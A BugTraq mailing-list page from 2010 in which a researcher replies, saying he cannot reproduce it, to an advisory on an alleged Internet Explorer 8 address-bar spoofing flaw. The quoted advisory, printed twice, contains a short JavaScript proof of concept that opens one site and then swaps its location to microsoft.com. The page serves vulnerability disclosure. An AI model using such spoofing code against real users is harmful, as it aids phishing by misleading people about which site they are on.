BugTraq
Back to list
|
Post reply
Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Jul 24 2010 11:08AM
info securitylab ir
(1 replies)
Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Jul 26 2010 04:30PM
Shreyas Zare (shreyas secfence com)
cant replicate it on my test setup. is something missing?
Shreyas Zare
Sr. Information Security Researcher
Secfence Technologies
www.secfence.com
On Sat, Jul 24, 2010 at 4:38 PM, <info (at) securitylab (dot) ir [email concealed]> wrote:
> Spoof Code:
>
> <script>
> function Spoof() {
> oc=window.open('http://www.securitylab.ir/', '','location=1');
> oc.location.replace('http://www.microsoft.com/');
> }
> </script>
> <p align="center">
> <a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
>
>
> Discovered by: Pouya Daneshmand
> http://Securitylab.ir/Advisories
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Shreyas Zare
Sr. Information Security Researcher
Secfence Technologies
www.secfence.com
On Sat, Jul 24, 2010 at 4:38 PM, <info (at) securitylab (dot) ir [email concealed]> wrote:
> Spoof Code:
>
> <script>
> function Spoof() {
> oc=window.open('http://www.securitylab.ir/', '','location=1');
> oc.location.replace('http://www.microsoft.com/');
> }
> </script>
> <p align="center">
> <a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
>
>
> Discovered by: Pouya Daneshmand
> http://Securitylab.ir/Advisories
>
[ reply ]